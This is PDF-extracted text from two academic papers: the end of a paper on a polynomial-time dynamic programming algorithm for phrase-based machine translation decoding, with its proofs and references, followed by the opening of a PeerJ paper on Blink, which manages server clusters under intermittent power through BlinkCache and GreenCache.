∆) returns the state reached when taking tran- sition ∆ ∈ δ(T). Given the state T = (j,{σ1 . . .σr}), each transi- tion is of the form ψ1 pψ2 where ψ1, p and ψ2 are defined as follows: 65 • p is a phrase such that s(p) = j + 1. • ψ1 ∈{σ1 . . .σr}∪{φ}. If ψ1 6= φ, it must be the case that |t(ψ1) + 1 −s(p)| ≤ d and t(ψ1) 6= n. • ψ2 ∈{σ1 . . .σr}∪{φ}. If ψ2 6= φ, it must be the case that |t(p) + 1 −s(ψ2)| ≤ d and s(ψ2) 6= 1. • If ψ1 6= φ and ψ2 6= φ, then ψ1 6= ψ2. Thus there are four possible types of transition from a state T = (j,{σ1 . . .σr}): Case 1: ∆ = φpφ. In this case the phrase p is incorporated as a stand-alone phrase. The new state T ′ is equal to (j′,{σ′1 . . .σ′r+1}) where j′ = t(p), where σ′i = σi for i = 1 . . .r, and σ ′ r+1 = (s(p),e1(p), t(p),em(p)). Case 2: ∆ = σi pφ for some σi ∈ {σ1 . . .σr}. In this case the phrase p is appended to the signa- ture σi. The new state T ′ = τ(T, ∆) is of the form (j′,σ′1 . . .σ ′ r), where j ′ = t(p), where σi is replaced by (s(σi),ws(σi), t(p),em(p)), and where σ′i′ = σi′ for all i′ 6= i. Case 3: ∆ = φpσi for some σi ∈ {σ1 . . .σr}. In this case the phrase p is prepended to the signa- ture σi. The new state T ′ = τ(T, ∆) is of the form (j′,σ′1 . . .σ ′ r), where j ′ = t(p), where σi is replaced by (s(p),e1(p), t(σi),wt(σi)), and where σ′i′ = σi′ for all i′ 6= i. Case 4: ∆ = σi pσi′ for some σi,σi′ ∈ {σ1 . . .σr}, with i′ 6= i. In this case phrase p is appended to signature σi, and prepended to signature σi′, effectively joining the two signa- tures together. In this case the new state T ′ = τ(T, ∆) is of the form (j′,σ′1 . . .σ ′ r−1), where sig- natures σi and σi′ are replaced by a new signature (s(σi),ws(σi), t(σi′),wt(σi′)), and all other signa- tures are copied across from T to T ′. Figure 3 gives the dynamic programming states and transitions for the derivation H in Figure 1. For example, the sub-derivation H7 = 〈〈 (1, 1,<s>)(2, 3, we must)(4, 4, also) 〉 , 〈 (5, 6, these criticisms)(7, 7, seriously) 〉〉 will be mapped to a state T = ( 7,σ(H7) ) = ( 7, { (1,<s>, 4, also), (5, these, 7, seriously) }) ( 1, { σ1 = ( 1,<s>, 1,<s> )}) ( 3, { σ1 = ( 1,<s>, 3, must )}) ( 4, { σ1 = ( 1,<s>, 4, also )}) ( 6, { σ1 = ( 1,<s>, 4, also ) , σ2 = ( 5, these, 6, criticisms )}) ( 7, { σ1 = ( 1,<s>, 4, also ) , σ2 = ( 5, these, 7, seriously )}) ( 8, { σ1 = ( 1,<s>, 7, seriously )}) ( 9, { σ1 = ( 1,<s>, 9,</s> )}) σ1 (2, 3, we must) φ σ1 (4, 4, also) φ φ (5, 6, these criticisms) φ σ2 (7, 7, seriously) φ σ1 (8, 8, take) σ2 σ1 (9, 9, </s>) φ Figure 3: Dynamic programming states and the transi- tions from one state to another, using the same example as in Figure 1. Note that σi = σ(πi) for all πi ∈ Hj. The transition σ1(8, 8, take) σ2 from this state leads to a new state, T ′ = ( 8, { σ1 = (1,<s>, 7, seriously) }) 4.3 Definition of score(∆) Figure 4 gives the definition of score(∆), which incorporates the language model, phrase scores, and distortion penalty implied by the transition ∆. 4.4 Definition of valid(T) Figure 5 gives the definition of valid(T). This function checks that the start and end points of each signature are in the set of allowed start and end points given in Lemma 2. 4.5 A Bound on the Runtime of the Algorithm We now give a bound on the algorithm’s run time. This will be the product of terms N and M, where N is an upper bound on the number of states in the dynamic program, and M is an upper bound on the number of outgoing transitions from any state. For any j ∈{1 . . .n}, define first(j) to be the set of target-language words that can begin at posi- tion j and last(j) to be the set of target-language 66 ∆ Resulting phrase sequence score(∆) φpφ (s,e1, t,em) ŵ(p) σi pφ (s(σi),ws(σi), t,em) ŵ(p) + λ(e1|wt(σi)) + η ×|t(σi) + 1 −s| φpσi (s,e1, t(σi),wt(σi)) ŵ(p) + λ(ws(σi)|em) + η ×|t + 1 −s(σi)| σi pσi′ (s(σi),ws(σi), t(σi′ ),wt(σi′ )) ŵ(p) + λ(e1|wt(σi)) + η ×|t(σi) + 1 −s| +λ(ws(σi′ )|em) + η ×|t + 1 −s(σi′ )| Figure 4: Four operations that can extend a state T = (j,{σ1 . . .σr}) by a phrase p = (s,t,e1 . . .em), and the scores incurred. We define ŵ(p) = κ(p) +∑m i=2 λ(ei(p)|ei−1(p)). The function ŵ(p) includes the phrase translation model κ and the language model scores that can be computed using p alone. The weight η is the distortion penalty. Function valid(T) Input: State T = ( j,{σ1 . . .σr} ) for i = 1 . . .r if s(σi) < j −d + 2 and s(σi) 6= 1 return FALSE if t(σi) < j −d return FALSE return TRUE Figure 5: The valid function. words that can end at position j. first(j) = {w : ∃p = (s,t,e) s.t. s = j,e1 = w} last(j) = {w : ∃p = (s,t,e) s.t. t = j,em = w} In addition, define singles(j) to be the set of phrases that translate the single word at position j: singles(j) = {p : s(p) = j and t(p) = j} Next, define h to be the smallest integer such that for all j, |first(j)| ≤ h, |last(j)| ≤ h, and |singles(j)| ≤ h. Thus h is a measure of the maximal ambiguity of any word xj in the input. Finally, for any position j, define start(j) to be the set of phrases starting at position j: start(j) = {p : s(p) = j} and define l to be the smallest integer such that for all j, |start(j)| ≤ l. Given these definitions we can state the following result: Theorem 1. The time complexity of the algorithm is O(nd!lhd+1). To prove this we need the following definition: Definition 4 (p-structures). For any finite set A of integers with |A| = k, a p-structure is a set of r or- dered pairs {(si, ti)}ri=1 that satisfies the following properties: 1) 0 ≤ r ≤ k; 2) for each i ∈ {1 . . .r}, si ∈ A and ti ∈ A (both si = ti and si 6= ti are allowed); 3) for each j ∈ A, there is at most one index i ∈{1 . . .r} such that (si = j) or (ti = j) or (si = j and ti = j). We use g(k) to denote the number of unique p- structures for a set A with |A| = k. We then have the following Lemmas: Lemma 4. The function g(k) satisfies g(0) = 0, g(1) = 2, and the following recurrence for k ≥ 2: g(k) = 2g(k − 1) + 2(n− 1)g(k − 2) Proof. The proof is in Appendix A. Lemma 5. Consider the function h(k) = k2×g(k). h(k) is in O((k − 2)!). Proof. The proof is in Appendix B. We can now prove the theorem: Proof of Theorem 1: First consider the num- ber of states in the dynamic program. Each state is of the form (j,{σ1 . . .σr}) where the set {(s(σi), t(σi))}ri=1 is a p-structure over the set {1}∪ {(j − d) . . .d}. The number of possible values for {(s(σi),e(σi))}ri=1 is at most g(d + 2). For a fixed choice of {(s(σi), t(σi))}ri=1 we will ar- gue that there are at most hd+1 possible values for {(ws(σi),wt(σi))}ri=1. This follows because for each k ∈ {(j − d) . . .j} there are at most h pos- sible choices: if there is some i such that s(σi) = k, and t(σi) 6= k, then the associated word ws(σi) is in the set first(k); alternatively if there is some i such that t(σi) = k, and s(σi) 6= k, then the as- sociated word wt(σi) is in the set last(k); alterna- tively if there is some i such that s(σi) = t(σi) = k then the associated words ws(σi),wt(σi) must be the first/last word of some phrase in singles(k); alternatively there is no i such that s(σi) = k or t(σi) = k, in which case there is no choice asso- ciated with position k in the sentence. Hence there are at most h choices associated with each position k ∈ {(j − d) . . .j}, giving hd+1 choices in total. Combining these results, and noting that there are 67 n choices of the variable j, implies that there are at most ng(d + 2)hd+1 states in the dynamic program. Now consider the number of transitions from any state. A transition is of the form ψ1pψ2 as defined in Section 4.2.1. For a given state there are at most (d + 2) choices for ψ1 and ψ2, and l choices for p, giving at most (d + 2)2l choices in total. Multiplying the upper bounds on the number of states and number of transitions for each state gives an upper bound on the runtime of the algorithm as O(ng(d + 2)hd+1(d + 2)2l). Hence by Lemma 5 the runtime is O(nd!lhd+1) time. The bound g(d + 2) over the number of possible values for {(s(σi),e(σi))}ri=1 is somewhat loose, as the set of p-structures over {1}∪{(j −d) . . .d} in- cludes impossible values {(si, ti)}ri=1 where for ex- ample there is no i such that s(σi) = 1. However the bound is tight enough to give the O(d!) runtime. 5 Discussion We conclude the paper with discussion of some is- sues. First we describe how the dynamic program- ming structures we have described can be used in conjunction with beam search. Second, we give more analysis of the complexity of the widely-used decoding algorithm of Koehn et al. (2003). 5.1 Beam Search Beam search is widely used in phrase-based decod- ing; it can also be applied to our dynamic program- ming construction. We can replace the line for each state T ∈Tj in the algorithm in Figure 2 with for each state T ∈ beam(Tj) where beam is a function that returns a subset of Tj, most often the highest scoring elements of Tj un- der some scoring criterion. A key question concerns the choice of scoring function γ(T) used to rank states. One proposal is to define γ(T) = α(T) + β(T) where α(T) is the score used in the dynamic program, and β(T) = ∑ i:ws(σi)6=<s> λu(ws(σi)). Here λu(w) is the score of word w under a unigram language model. The β(T) scores allow different states in Tj, which have different words ws(σi) at the start of signatures, to be comparable: for exam- ple it compensates for the case where ws(σi) is a rare word, which will incur a low probability when the bigram 〈w ws(σi)〉 for some word w is constructed during search. The β(T) values play a similar role to “future scores” in the algorithm of Koehn et al. (2003). However in the Koehn et al. (2003) algorithm, dif- ferent items in the same beam can translate differ- ent subsets of the input sentence, making future- score estimation more involved. In our case all items in Tj translate all words x1 . . .xj inclusive, which may make comparison of different hypotheses more straightforward. 5.2 Complexity of Decoding with Bit-string Representations A common method for decoding phrase-based mod- els, as described in Koehn et al. (2003), is to use beam search in conjunction with a search algorithm that 1) creates the target language string in strictly left-to-right order; 2) uses a bit string with bits bi ∈{0, 1} for i = 1 . . .n representing at each point whether word i in the input has been translated. A natural question is whether the number of possible bit strings for a model with a fixed distortion limit d can grow exponentially quickly with respect to the length of the input sentence. This section gives an example that shows that this is indeed the case. Assume that our sentence length n is such that (n−2)/4 is an integer. Assume as before x1 = <s> and xn = </s>. For each k ∈ {0 . . . ((n− 2)/4 − 1)}, assume we have the following phrases for the words x4k+2 . . .x4k+5: (4k + 2, 4k + 2,uk) (4k + 3, 4k + 3,vk) (4k + 4, 4k + 4,wk) (4k + 5, 4k + 5,zk) (4k + 4, 4k + 5,yk) Note that the only source of ambiguity is for each k whether we use yk to translate the entire phrase x4k+4x4k+5, or whether we use wk and zk to trans- late x4k+4 and x4k+5 separately. With a distortion limit d ≥ 5, the number of pos- sible bit strings in this example is at least 2(n−2)/4. This follows because for any setting of the variables b4k+4 ∈ {0, 1} for k ∈ {0 . . . ((n − 2)/4 − 1)}, 68 there is a valid derivation p1 . . .pL such that the pre- fix p1 . . .pl where l = 1 + (n − 2)/4 gives this bit string. Simply choose p1 = (1, 1,<s>) and for l′ ∈ {0 . . . (n−2)/4−1} choose pl′+2 = (4l′ + 4, 4l′ + 5,yi) if b4k+4 = 1, pl′+2 = (4l′ + 5, 4l′ + 5,zi) otherwise. It can be verified that p1 . . .pl is a valid prefix (there is a valid way to give a complete deriva- tion from this prefix). As one example, for n = 10, and b4 = 1 and b8 = 0, a valid derivation is (1, 1,<s>)(4, 5,y1)(9, 9,z2)(7, 7,v2)(3, 3,v1) (2, 2,u1)(6, 6,u2)(8, 8,w2)(10, 10,</s>) In this case the prefix (1, 1,<s>)(4, 5,y1)(9, 9,z2) gives b4 = 1 and b8 = 0. Other values for b4 and b8 can be given by using (5, 5,z1) in place of (4, 5,y1), and (8, 9,y2) in place of (9, 9,z2), with the follow- ing phrases modified appropriately. 6 Conclusion We have given a polynomial-time dynamic program- ming algorithm for phrase-based decoding with a fixed distortion limit. The algorithm uses a quite dif- ferent representation of states from previous decod- ing algorithms, is easily amenable to beam search, and leads to a new perspective on phrase-based de- coding. Future work should investigate the effec- tiveness of the algorithm in practice. A Proof of Lemma 4 Without loss of generality assume A = {1, 2, 3, . . .k}. We have g(1) = 2, because in this case the valid p-structures are {(1, 1)} and ∅. To calculate g(k) we can sum over four possibilities: Case 1: There are g(k− 1) p-structures with si = ti = 1 for some i ∈ {1 . . .r}. This follows because once si = ti = 1 for some i, there are g(k − 1) possible p-structures for the integers {2, 3, 4 . . .k}. Case 2: There are g(k − 1) p-structures such that si 6= 1 and ti 6= 1 for all i ∈ {1 . . .r}. This fol- lows because once si 6= 1 and ti 6= 1 for all i, there are g(k − 1) possible p-structures for the integers {2, 3, 4 . . .k}. Case 3: There are (k− 1) ×g(k− 2) p-structures such that there is some i ∈ {1 . . .r} with si = 1 and ti 6= 1. This follows because for the i such that si = 1, there are (k−1) choices for the value for ti, and there are then g(k− 2) possible p-structures for the remaining integers in the set {1 . . .k}/{1, ti}. Case 4: There are (k− 1) ×g(k− 2) p-structures such that there is some i ∈ {1 . . .r} with ti = 1 and si 6= 1. This follows because for the i such that ti = 1, there are (k−1) choices for the value for si, and there are then g(k− 2) possible p-structures for the remaining integers in the set {1 . . .k}/{1,si}. Summing over these possibilities gives the fol- lowing recurrence: g(k) = 2g(k − 1) + 2(k − 1) ×g(k − 2) B Proof of Lemma 5 Recall that h(k) = f(k) ×g(k) where f(k) = k2. Define k0 to be the smallest integer such that for all k ≥ k0, 2f(k) f(k − 1) + 2f(k) f(k − 2) · k − 1 k − 3 ≤ k − 2 (4) For f(k) = k2 we have k0 = 9. Now choose a constant c such that for all k ∈ {1 . . . (k0 − 1)}, h(k) ≤ c × (k − 2)!. We will prove by induction that under these definitions of k0 and c we have h(k) ≤ c(k − 2)! for all integers k, hence h(k) is in O((k − 2)!). For values k ≥ k0, we have h(k) = f(k)g(k) = 2f(k)g(k − 1) + 2f(k)(k − 1)g(k − 2) (5) = 2f(k) f(k − 1)h(k − 1) + 2f(k) f(k − 2) (k − 1)h(k − 2) ≤ ( 2cf(k) f(k − 1) + 2cf(k) f(k − 2) · k − 1 k − 3 ) (k − 3)! (6) ≤ c(k − 2)! (7) Eq. 5 follows from g(k) = 2g(k−1)+2(k−1)g(k− 2). Eq. 6 follows by the inductive hypothesis that h(k − 1) ≤ c(k − 3)! and h(k − 2) ≤ c(k − 4)!. Eq 7 follows because Eq. 4 holds for all k ≥ k0. References Wilker Aziz, Marc Dymetman, and Lucia Specia. 2014. Exact decoding for phrase-based statistical machine translation. In Proceedings of the Conference on Em- pirical Methods in Natural Language Processing. As- sociation for Computational Linguistics. 69 Yin-Wen Chang and Michael Collins. 2011. Exact de- coding of phrase-based translation models through La- grangian relaxation. In Proceedings of the Conference on Empirical Methods in Natural Language Process- ing, pages 26–37. Association for Computational Lin- guistics. Colin Cherry, Robert C Moore, and Chris Quirk. 2012. On hierarchical re-ordering and permutation parsing for phrase-based decoding. In Proceedings of the Seventh Workshop on Statistical Machine Translation, pages 200–209. Association for Computational Lin- guistics. John DeNero and Dan Klein. 2008. The complexity of phrase alignment problems. In Proceedings of the 46th Annual Meeting of the Association for Computational Linguistics on Human Language Technologies: Short Papers, pages 25–28. Association for Computational Linguistics. Yang Feng, Haitao Mi, Yang Liu, and Qun Liu. 2010. An efficient shift-reduce decoding algorithm for phrased- based machine translation. In Proceedings of the 23rd International Conference on Computational Linguis- tics: Posters, pages 285–293. Association for Compu- tational Linguistics. Michel Galley and Christopher D Manning. 2008. A simple and effective hierarchical phrase reordering model. In Proceedings of the Conference on Empir- ical Methods in Natural Language Processing, pages 848–856. Association for Computational Linguistics. Michel Galley and Christopher D Manning. 2010. Accu- rate non-hierarchical phrase-based translation. In Hu- man Language Technologies: The 2010 Annual Con- ference of the North American Chapter of the Associ- ation for Computational Linguistics, pages 966–974. Association for Computational Linguistics. Kevin Knight. 1999. Decoding complexity in word- replacement translation models. Computational Lin- guistics, 25(4). Philipp Koehn, Franz Josef Och, and Daniel Marcu. 2003. Statistical phrase-based translation. In Proceed- ings of the 2003 Conference of the North American Chapter of the Association for Computational Linguis- tics on Human Language Technology-Volume 1, pages 48–54. Association for Computational Linguistics. Philipp Koehn, Amittai Axelrod, Chris Callison-Burch, Miles Osborne, and David Talbot. 2007a. Edinburgh system description for the 2005 IWSLT speech trans- lation evaluation. In Proceedings of the Second Work- shop on Statistical Machine Translation, StatMT ’07, pages 224–227, Stroudsburg, PA, USA. Association for Computational Linguistics. Philipp Koehn, Hieu Hoang, Alexandra Birch, Chris Callison-Burch, Marcello Federico, Nicola Bertoldi, Brooke Cowan, Wade Shen, Christine Moran, Richard Zens, Chris Dyer, Ondřej Bojar, Alexandra Con- stantin, and Evan Herbst. 2007b. Moses: Open source toolkit for statistical machine translation. In Proceed- ings of the 45th annual meeting of the ACL on inter- active poster and demonstration sessions, pages 177– 180. Association for Computational Linguistics. Shankar Kumar and William Byrne. 2005. Local phrase reordering models for statistical machine translation. In Proceedings of the conference on Human Language Technology and Empirical Methods in Natural Lan- guage Processing, pages 161–168. Association for Computational Linguistics. Eugene Leighton Lawler, Jan Karel Lenstra, Alexander Hendrik George Rinnooy Kan, and David Bernard Shmoys. 1985. The Traveling Salesman Problem. John Wiley & Sons Ltd. Adam Lopez. 2009. Translation as weighted deduction. In Proceedings of the 12th Conference of the European Chapter of the Association for Computational Linguis- tics, pages 532–540. Association for Computational Linguistics. Burkhard Monien and Ivan Hal Sudborough. 1981. Bandwidth constrained NP-complete problems. In Proceedings of the thirteenth annual ACM symposium on Theory of computing, pages 207–217. ACM. Franz Josef Och and Hermann Ney. 2004. The align- ment template approach to statistical machine transla- tion. Computational linguistics, 30(4):417–449. H Donald Ratliff and Arnon S Rosenthal. 1983. Order- picking in a rectangular warehouse: a solvable case of the traveling salesman problem. Operations Research, 31(3):507–521. Christoph Tillmann. 2004. A unigram orientation model for statistical machine translation. In Proceedings of HLT-NAACL 2004: Short Papers, pages 101–104. As- sociation for Computational Linguistics. Dekai Wu. 1997. Stochastic inversion transduction grammars and bilingual parsing of parallel corpora. Computational linguistics, 23(3):377–403. Mikhail Zaslavskiy, Marc Dymetman, and Nicola Can- cedda. 2009. Phrase-based statistical machine transla- tion as a traveling salesman problem. In Proceedings of the Joint Conference of the 47th Annual Meeting of the ACL and the 4th International Joint Conference on Natural Language Processing of the AFNLP: Volume 1-Volume 1, pages 333–341. Association for Compu- tational Linguistics. Richard Zens and Hermann Ney. 2003. A comparative study on reordering constraints in statistical machine translation. In Proceedings of the 41st Annual Meeting on Association for Computational Linguistics-Volume 1, pages 144–151. Association for Computational Lin- guistics. 70 Richard Zens, Hermann Ney, Taro Watanabe, and Ei- ichiro Sumita. 2004. Reordering constraints for phrase-based statistical machine translation. In Pro- ceedings of the 20th international conference on Computational Linguistics, page 205. Association for Computational Linguistics. 71 72 work_y2wdmmp76vgxzolncbcl4sfin4 ---- Managing server clusters on intermittent power Submitted 31 July 2015 Accepted 3 November 2015 Published 9 December 2015 Corresponding author Navin Sharma, nksharma@cs.umass.edu Academic editor Srikumar Venugopal Additional Information and Declarations can be found on page 46 DOI 10.7717/peerj-cs.34 Copyright 2015 Sharma et al. Distributed under Creative Commons CC-BY 4.0 OPEN ACCESS Managing server clusters on intermittent power Navin Sharma1, Dilip Krishnappa2, Sean Barker3, David Irwin4 and Prashant Shenoy1 1 College of Information and Computer Sciences, University of Massachusetts at Amherst, Amherst, MA, United States 2 Akamai Technologies, Cambridge, MA, United States 3 Department of Computer Science, Bowdoin College, Brunswick, ME, United States 4 Electrical and Computer Engineering, University of Massachusetts at Amherst, Amherst, MA, United States ABSTRACT Reducing the energy footprint of data centers continues to receive significant attention due to both its financial and environmental impact. There are numerous methods that limit the impact of both factors, such as expanding the use of renewable energy or participating in automated demand-response programs. To take advantage of these methods, servers and applications must gracefully handle intermittent constraints in their power supply. In this paper, we propose blinking—metered transitions between a high-power active state and a low-power inactive state—as the primary abstraction for conforming to intermittent power constraints. We design Blink, an application-independent hardware–software platform for developing and evaluating blinking applications, and define multiple types of blinking policies. We then use Blink to design both a blinking version of memcached (BlinkCache) and a multimedia cache (GreenCache) to demonstrate how application characteristics affect the design of blink-aware distributed applications. Our results show that for BlinkCache, a load-proportional blinking policy combines the advantages of both activation and synchronous blinking for realistic Zipf-like popularity distributions and wind/solar power signals by achieving near optimal hit rates (within 15% of an activation policy), while also providing fairer access to the cache (within 2% of a synchronous policy) for equally popular objects. In contrast, for GreenCache, due to multimedia workload patterns, we find that a staggered load proportional blinking policy with replication of the first chunk of each video reduces the buffering time at all power levels, as compared to activation or load-proportional blinking policies. Subjects Distributed and Parallel Computing, Multimedia, Operating Systems Keywords Green data center, Intermittent power, Blink, Green cache, Memcached, Multimedia cache INTRODUCTION Energy-related costs have become a significant fraction of total cost of ownership (TCO) in modern data centers. Recent estimates attribute 31% of TCO to both purchasing power and building and maintaining the power distribution and cooling infrastructure (Hamil- ton, 2010). Consequently, techniques for reducing the energy footprint of data centers How to cite this article Sharma et al. (2015), Managing server clusters on intermittent power. PeerJ Comput. Sci. 1:e34; DOI 10.7717/peerj-cs.34 mailto:nksharma@cs.umass.edu https://peerj.com/academic-boards/editors/ https://peerj.com/academic-boards/editors/ http://dx.doi.org/10.7717/peerj-cs.34 http://dx.doi.org/10.7717/peerj-cs.34 http://creativecommons.org/licenses/by/4.0/ http://creativecommons.org/licenses/by/4.0/ https://peerj.com/computer-science/ http://dx.doi.org/10.7717/peerj-cs.34 continue to receive significant attention in both industry and the research community. We categorize these techniques broadly as being either primarily workload-driven or power-driven. Workload-driven systems reconfigure applications as their workload demands vary to use the least possible amount of power to satisfy demand (Ahmad & Vijaykumar, 2010; Moore, Chase & Ranganathan, 2006; Moore et al., 2005). In contrast, power-driven systems reconfigure applications as their power supply varies to achieve the best performance possible given the power constraints. While prior work has largely emphasized workload-driven systems, power-driven systems are becoming increasingly important. For instance, data centers are beginning to rely on intermittent renewable energy sources, such as solar and wind, to partially power their operations (Gupta, 2010; Stone, 2007). Intermittent power constraints are also common in developing regions that experience “brownouts” where the electric grid temporarily reduces its supply under high load (Chase et al., 2001; Verma et al., 2009). The key challenge in power-driven systems is optimizing application performance in the presence of power constraints that may vary significantly and frequently over time. Importantly, these power and resource consumption constraints are independent of workload demands. The ability to use intermittent power introduces other opportunities, beyond increasing use of renewable energy, for optimizing a data center to be cheaper, greener, and more reliable. We argue that designing systems to exploit these optimizations will move us closer to the vision of a net-zero data center. • Market-based electricity pricing. Electricity prices vary continuously based on supply and demand. Many utilities now offer customers access to market-based rates that vary every five minutes to an hour (Elevate Energy, 2011). As a result, the power data centers are able to purchase for a fixed price varies considerably and frequently over time. For instance, in the New England hourly wholesale market in 2011, maintaining a fixed $55/h budget, rather than a fixed per-hour power consumption, purchases 16% more power for the same price (Fig. 1). The example demonstrates that data centers that execute delay-tolerant workloads, such as data-intensive batch jobs, have an opportunity to reduce their electric bill by varying their power usage based on price. • Unexpected blackouts or brownouts. Data centers often use UPSs for backup power during unexpected blackouts. An extended blackout may force a data center to limit power consumption at a low level to extend UPS lifetime. While low power levels impact performance, it may be critical for certain applications to maintain some, even low, level of availability, e.g., disaster response applications. As we discuss, maintaining availability at low power levels is challenging if applications access distributed state. Further, in many developing countries, the electric grid is highly unstable with voltage rising and falling unexpectedly based on changing demands. These “brownouts” may also affect the power available to data centers over time. • 100% power infrastructure utilization. Another compelling use of intermittent power is continuously operating a data center’s power delivery infrastructure at 100%. Since Sharma et al. (2015), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.34 2/50 https://peerj.com/computer-science/ http://dx.doi.org/10.7717/peerj-cs.34 Figure 1 Electricity prices vary every five minutes to an hour in wholesale markets, resulting in the power available for a fixed monetary budget varying considerably over time data center capital costs are enormous, maximizing the power delivery infrastructure’s utilization by operating as many servers as possible is important. However, data centers typically provision power for peak demands, resulting in low utilization (Fan, Weber & Barroso, 2007a; Kontorinis et al., 2012). In this case, intermittent power is useful to continuously run a background workload on a set of servers—designed explicitly for intermittent power—that always consume the excess power PDUs are capable of delivering. Since the utilization (and power usage) of a data center’s foreground workload may vary rapidly, the background servers must be capable of quickly varying power usage to not exceed the power delivery infrastructure’s limits. In this paper, we present Blink, a new energy abstraction for gracefully handling intermittent power constraints. Blinking applies a duty cycle to servers that controls the fraction of time they are in the active state, e.g., by activating and deactivating them in succession, to gracefully vary their energy footprint. For example, a system that blinks every 30 s, i.e., is on for 30 s and then off for 30 s, consumes half the energy, modulo overheads, of an always-on system. Blinking generalizes the extremes of either keeping a server active (a 100% duty cycle) or inactive (a 0% duty cycle) by providing a spectrum of intermediate possibilities. Blinking builds on prior work in energy-aware design. First, several studies have shown that turning a server off when not in use is the most effective method for saving energy in server clusters (Chase et al., 2001; Pinheiro et al., 2001). Second, blinking extends the PowerNap (Meisner, Gold & Wenisch, 2009) concept, which advocates frequent transitions to a low-power sleep state, as an effective means of reducing idle power waste. An application’s blinking policy decides when each node is active or inactive at any instant based on both its workload characteristics and energy constraints. Clearly, blinking impacts application performance, since there may not always be enough energy to power Sharma et al. (2015), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.34 3/50 https://peerj.com/computer-science/ http://dx.doi.org/10.7717/peerj-cs.34 the nodes necessary to meet demand. Hence, the goal of a blinking policy is to minimize performance degradation as power varies. In general, application modifications are nec- essary to adapt traditional server-based applications for blinking, since these applications implicitly assume always-on, or mostly-on, servers. Blinking forces them to handle regular disconnections more often associated with weakly connected (Terry et al., 1995) environ- ments, e.g., mobile, where nodes are unreachable whenever they are off or out of range. Example applications for blink To demonstrate how blinking impacts common data center applications, we explore the design of BlinkCache—a blinking version of memcached that gracefully handles intermittent power constraints and GreenCache—a distributed cache for multimedia data that runs off renewable energy—as proof-of-concept examples. Memcached is a distributed memory cache for storing key-value pairs that many prominent Internet sites, including LiveJournal, Facebook, Flickr, Twitter, YouTube, and others, use to improve their performance. For Internet services that store user-generated content, the typical user is often interested in the relatively unpopular objects in the heavy tail, since these objects represent either their personal content or the content of close friends and associates. As one example, Fig. 2 depicts a popularity distribution for Facebook group pages in terms of their number of fans. While the figure only shows the popularity rank of the top 10,000 pages, Facebook has over 20 million group pages in total. Most of these pages are nearly equally unpopular. For these equally unpopular objects, blinking nodes synchronously to handle variable power constraints results in fairer access to the cache because the probability of finding an object becomes equal for all objects in the cache. While fair cache access is important, maximizing memcached’s hit rate requires prioritizing access to the most popular objects. We explore these performance tradeoffs in-depth for a memcached cluster with intermittent power constraints. In contrast, GreenCache leverages the blinking abstraction to modulate its energy footprint to match available power while minimizing both backhaul bandwidth and client access latency for a large video library. As discussed above, minimizing bandwidth usage (or cost) and maximizing users’ experience, e.g., by reducing buffering time, are the two primary goals of a multimedia cache. We analyze video traffic behavior of a large number of users for the most popular user-generated video site, YouTube, and exploit traffic characteristics and video properties to design new placement and blinking policies for minimizing bandwidth usage and maximizing users’ experience. Contributions In designing, implementing, and evaluating BlinkCache and GreenCache as proof- of-concept examples of using the blink abstraction, this paper makes the following contributions.1 1 This paper combines and extends two prior conference publications: Blink (Sharma et al., 2011) and GreenCache (Sharma et al., 2013). In addition to rewriting this paper from the ground up to merge our prior work, we have also designed (a) a blink emulator to emulate a renewable-powered server cluster and (b) used the emulator for scalability analysis of blinking applications on large server clusters. • Make the case for blinking systems. We propose blinking systems to deal with variable power constraints in server clusters. We motivate why blinking is a beneficial abstraction Sharma et al. (2015), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.34 4/50 https://peerj.com/computer-science/ http://dx.doi.org/10.7717/peerj-cs.34 Figure 2 The popularity of web data often exhibits a long heavy tail of equally unpopular objects. This graph ranks the popularity of Facebook group pages by their number of fans. for dealing with intermittent power constraints, define different types of blinking policies, and discuss its potential impact on a range of distributed applications. • Design a blinking hardware/software platform. We design Blink, an application- independent hardware/software platform to develop and evaluate blinking applications. Our small-scale prototype uses a cluster of 10 low-power motherboards connected to a programmable power meter that replays custom power traces and variable power traces from a solar and wind energy harvesting deployment. • Design, Implement, Evaluate BlinkCache and GreenCache. We use Blink to experi- ment with blinking policies for BlinkCache and GreenCache, a variant of memcached and multimedia cache, respectively, and optimize the performance for intermittent power constraints. For BlinkCache, our hypothesis is that a load-proportional blinking policy, which keeps nodes active in proportion to the popularity of the data they store, combined with object migration to group together objects with similar popularities, results in near optimal cache hit rates, as well as fairness for equally unpopular objects. To validate our hypothesis, we compare the performance of activation, synchronous, and load-proportional policies for realistic Zipf-like popularity distributions. We show that a load-proportional policy is significantly more fair than an optimal activation policy for equally popular objects (4X at low power) while achieving a comparable hit rate (over 60% at low power). For GreenCache, our hypothesis is that a staggered load proportional policy which keeps the nodes active based on their load and the available power in staggered manner, with replication of the first chunk of each video on all servers, yields lower buffering time for clients, compared to activation or load-proportional blinking policies, when operating under variable power. • Blinking scalability performance. To see how blinking scales with the size of a cluster we emulate our small-scale server cluster and study the performance of BlinkCache Sharma et al. (2015), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.34 5/50 https://peerj.com/computer-science/ http://dx.doi.org/10.7717/peerj-cs.34 and GreenCache for a 1,000 node cluster. Our hypothesis is that the performance of a blinking policy should be independent of the cluster size. ‘Blink: Rationale and Overview’ provides an overview of the blinking abstraction and various blinking policies. ‘Blink Prototype’ presents Blink’s hardware and software archi- tecture in detail, while ‘BlinkCache: Blinking Memcached’ presents design alternatives for BlinkCache, a blinking version of memcached. ‘GreenCache: Blinking Multimedia Cache’ presents the design techniques for GreenCache, a blinking version of multimedia cache. We provide the implementation and evaluation of both applications in ‘Implementation’ and ‘Evaluation’, respectively. Finally, ‘Related Work’ discusses related work, ‘Applicability of Blinking’ outlines the applicability of blinking to other applications, and ‘Conclusion’ concludes. BLINK: RATIONALE AND OVERVIEW Today’s computing systems are not energy-proportional (Barroso & Hölzle, 2007)—a key factor that hinders data centers from effectively varying their power consumption by controlling their utilization. Designing energy-proportional systems is challenging, in part, since a variety of server components, including the CPU, memory, disk, motherboard, and power supply, now consume significant amounts of power. Thus, any power optimization that targets only a single component is not sufficient for energy-proportionality, since it reduces only a fraction of the total power consumption (Barroso & Hölzle, 2007; Le Sueur & Heiser, 2010). As one example, due to the power consumption of non-CPU components, a modern server that uses dynamic voltage and frequency scaling in the CPU at low utilization may still operate at over 50% of its peak power (Anderson et al., 2009; Tolia et al., 2008). Thus, deactivating entire servers, including most of their components, remains the most effective technique for controlling energy consumption in server 